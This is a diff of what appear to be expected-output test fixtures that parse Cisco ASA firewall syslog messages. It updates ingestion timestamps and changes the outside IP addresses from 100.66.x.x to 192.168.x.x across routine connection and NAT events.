@@ -3316,8 +3316,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164589200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265", + "ingested": "2021-12-09T13:33:41.994967800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -3350,8 +3350,8 @@ }, "source": { "port": 80, - "address": "100.66.179.219", - "ip": "100.66.179.219" + "address": "192.168.179.219", + "ip": "192.168.179.219" }, "tags": [ "preserve_original_event" @@ -3386,7 +3386,7 @@ "localhost" ], "ip": [ - "100.66.179.219", + "192.168.179.219", "172.31.98.44" ] }, @@ -3395,8 +3395,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164597400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", + "ingested": "2021-12-09T13:33:41.994974Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3412,7 +3412,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.179.219", + "mapped_source_ip": "192.168.179.219", "connection_id": "11774", "source_interface": "outside", "mapped_destination_port": 1452 @@ -3434,8 +3434,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" 
@@ -3470,7 +3470,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -3479,8 +3479,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164605400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994980400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3496,7 +3496,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.157.232", + "mapped_source_ip": "192.168.157.232", "connection_id": "11775", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3518,8 +3518,8 @@ }, "source": { "port": 53, - "address": "100.66.178.133", - "ip": "100.66.178.133" + "address": "192.168.178.133", + "ip": "192.168.178.133" }, "tags": [ "preserve_original_event" @@ -3554,7 +3554,7 @@ "localhost" ], "ip": [ - "100.66.178.133", + "192.168.178.133", "172.31.98.44" ] }, @@ -3563,8 +3563,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164610900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994986700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", 
@@ -3580,7 +3580,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.178.133", + "mapped_source_ip": "192.168.178.133", "connection_id": "11776", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3602,8 +3602,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -3638,7 +3638,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -3648,8 +3648,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164617Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", + "ingested": "2021-12-09T13:33:41.994993100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3686,8 +3686,8 @@ }, "source": { "port": 53, - "address": "100.66.178.133", - "ip": "100.66.178.133" + "address": "192.168.178.133", + "ip": "192.168.178.133" }, "tags": [ "preserve_original_event" @@ -3722,7 +3722,7 @@ "localhost" ], "ip": [ - "100.66.178.133", + "192.168.178.133", "172.31.98.44" ] }, 
@@ -3732,8 +3732,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164623200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", + "ingested": "2021-12-09T13:33:41.994998600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3765,8 +3765,8 @@ }, "destination": { "port": 8266, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1453, @@ -3806,7 +3806,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -3814,8 +3814,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164627600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266", + "ingested": "2021-12-09T13:33:41.995002700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -3848,8 +3848,8 @@ }, "source": { "port": 80, - "address": "100.66.133.112", - "ip": "100.66.133.112" + "address": "192.168.133.112", + "ip": "192.168.133.112" }, "tags": [ "preserve_original_event" @@ -3884,7 +3884,7 @@ "localhost" ], "ip": [ - "100.66.133.112", + "192.168.133.112", "172.31.98.44" ] }, 
@@ -3893,8 +3893,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164633300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", + "ingested": "2021-12-09T13:33:41.995007500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3910,7 +3910,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.133.112", + "mapped_source_ip": "192.168.133.112", "connection_id": "11777", "source_interface": "outside", "mapped_destination_port": 1453 @@ -3932,8 +3932,8 @@ }, "source": { "port": 80, - "address": "100.66.133.112", - "ip": "100.66.133.112" + "address": "192.168.133.112", + "ip": "192.168.133.112" }, "tags": [ "preserve_original_event" @@ -3968,7 +3968,7 @@ "localhost" ], "ip": [ - "100.66.133.112", + "192.168.133.112", "172.31.98.44" ] }, @@ -3979,8 +3979,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.164639Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", + "ingested": "2021-12-09T13:33:41.995013800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -4017,8 +4017,8 @@ }, "source": { "port": 53, - "address": "100.66.204.197", - "ip": "100.66.204.197" + "address": "192.168.204.197", + "ip": "192.168.204.197" }, "tags": [ "preserve_original_event" @@ -4053,7 +4053,7 @@ "localhost" ], "ip": [ - "100.66.204.197", + "192.168.204.197", "172.31.98.44" ] }, @@ -4062,8 +4062,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164646300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995020100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -4079,7 +4079,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.204.197", + "mapped_source_ip": "192.168.204.197", "connection_id": "11779", "source_interface": "outside", "mapped_destination_port": 56132 @@ -4101,8 +4101,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -4137,7 +4137,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, 
@@ -4147,8 +4147,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164654300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:33:41.995024700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4185,8 +4185,8 @@ }, "source": { "port": 53, - "address": "100.66.204.197", - "ip": "100.66.204.197" + "address": "192.168.204.197", + "ip": "192.168.204.197" }, "tags": [ "preserve_original_event" @@ -4221,7 +4221,7 @@ "localhost" ], "ip": [ - "100.66.204.197", + "192.168.204.197", "172.31.98.44" ] }, @@ -4231,8 +4231,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164662500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", + "ingested": "2021-12-09T13:33:41.995030300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4264,8 +4264,8 @@ }, "destination": { "port": 8267, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1454, @@ -4305,7 +4305,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -4313,8 +4313,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164670600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267", + "ingested": "2021-12-09T13:33:41.995036800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4347,8 +4347,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4383,7 +4383,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4392,8 +4392,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164678700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", + "ingested": "2021-12-09T13:33:41.995041700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4409,7 +4409,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11780", "source_interface": "outside", "mapped_destination_port": 1454 @@ -4426,8 +4426,8 @@ }, "destination": { "port": 8268, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1455, 
@@ -4467,7 +4467,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4475,8 +4475,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164686600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268", + "ingested": "2021-12-09T13:33:41.995046700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4509,8 +4509,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4545,7 +4545,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4554,8 +4554,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164695Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", + "ingested": "2021-12-09T13:33:41.995051Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4571,7 +4571,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11781", "source_interface": "outside", "mapped_destination_port": 1455 
@@ -4588,8 +4588,8 @@
 },
 "destination": {
 "port": 8269,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1456,
@@ -4629,7 +4629,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -4637,8 +4637,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164702800Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269",
+ "ingested": "2021-12-09T13:33:41.995056700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -4671,8 +4671,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.128.3",
- "ip": "100.66.128.3"
+ "address": "192.168.128.3",
+ "ip": "192.168.128.3"
 },
 "tags": [
 "preserve_original_event"
@@ -4707,7 +4707,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.128.3",
+ "192.168.128.3",
 "172.31.98.44"
 ]
 },
@@ -4716,8 +4716,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164709700Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)",
+ "ingested": "2021-12-09T13:33:41.995063500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -4733,7 +4733,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.128.3",
+ "mapped_source_ip": "192.168.128.3",
 "connection_id": "11782",
 "source_interface": "outside",
 "mapped_destination_port": 1456
@@ -4755,8 +4755,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.100.4",
- "ip": "100.66.100.4"
+ "address": "192.168.100.4",
+ "ip": "192.168.100.4"
 },
 "tags": [
 "preserve_original_event"
@@ -4791,7 +4791,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.100.4",
+ "192.168.100.4",
 "172.31.98.44"
 ]
 },
@@ -4800,8 +4800,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164716100Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:33:41.995068600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -4817,7 +4817,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.100.4",
+ "mapped_source_ip": "192.168.100.4",
 "connection_id": "11783",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -4839,8 +4839,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.100.4",
- "ip": "100.66.100.4"
+ "address": "192.168.100.4",
+ "ip": "192.168.100.4"
 },
 "tags": [
 "preserve_original_event"
@@ -4875,7 +4875,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.100.4",
+ "192.168.100.4",
 "172.31.98.44"
 ]
 },
@@ -4885,8 +4885,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-10-06T20:55:00.164725100Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104",
+ "ingested": "2021-12-09T13:33:41.995074900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -4918,8 +4918,8 @@
 },
 "destination": {
 "port": 8270,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1457,
@@ -4959,7 +4959,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -4967,8 +4967,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164732Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270",
+ "ingested": "2021-12-09T13:33:41.995081200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -5001,8 +5001,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.198.40",
- "ip": "100.66.198.40"
+ "address": "192.168.198.40",
+ "ip": "192.168.198.40"
 },
 "tags": [
 "preserve_original_event"
@@ -5037,7 +5037,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.198.40",
+ "192.168.198.40",
 "172.31.98.44"
 ]
 },
@@ -5046,8 +5046,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164738900Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)",
+ "ingested": "2021-12-09T13:33:41.995087600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -5063,7 +5063,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.198.40",
+ "mapped_source_ip": "192.168.198.40",
 "connection_id": "11784",
 "source_interface": "outside",
 "mapped_destination_port": 1457
@@ -5080,8 +5080,8 @@
 },
 "destination": {
 "port": 8271,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1458,
@@ -5121,7 +5121,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -5129,8 +5129,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164745Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271",
+ "ingested": "2021-12-09T13:33:41.995094100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -5163,8 +5163,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.198.40",
- "ip": "100.66.198.40"
+ "address": "192.168.198.40",
+ "ip": "192.168.198.40"
 },
 "tags": [
 "preserve_original_event"
@@ -5199,7 +5199,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.198.40",
+ "192.168.198.40",
 "172.31.98.44"
 ]
 },
@@ -5208,8 +5208,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164749800Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)",
+ "ingested": "2021-12-09T13:33:41.995100500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -5225,7 +5225,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.198.40",
+ "mapped_source_ip": "192.168.198.40",
 "connection_id": "11785",
 "source_interface": "outside",
 "mapped_destination_port": 1458
@@ -5247,8 +5247,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.1.107",
- "ip": "100.66.1.107"
+ "address": "192.168.1.107",
+ "ip": "192.168.1.107"
 },
 "tags": [
 "preserve_original_event"
@@ -5283,7 +5283,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.1.107",
+ "192.168.1.107",
 "172.31.98.44"
 ]
 },
@@ -5292,8 +5292,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164755400Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:33:41.995106700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -5309,7 +5309,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.1.107",
+ "mapped_source_ip": "192.168.1.107",
 "connection_id": "11786",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -5331,8 +5331,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.198.40",
- "ip": "100.66.198.40"
+ "address": "192.168.198.40",
+ "ip": "192.168.198.40"
 },
 "tags": [
 "preserve_original_event"
@@ -5367,7 +5367,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.198.40",
+ "192.168.198.40",
 "172.31.98.44"
 ]
 },
@@ -5378,8 +5378,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-10-06T20:55:00.164763500Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs",
+ "ingested": "2021-12-09T13:33:41.995113Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -5411,8 +5411,8 @@
 },
 "destination": {
 "port": 8272,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1459,
@@ -5452,7 +5452,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -5460,8 +5460,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:55:00.164771600Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272",
+ "ingested": "2021-12-09T13:33:41.995119200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -5494,8 +5494,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.198.40",
- "ip": "100.66.198.40"
+ "address": "192.168.198.40",
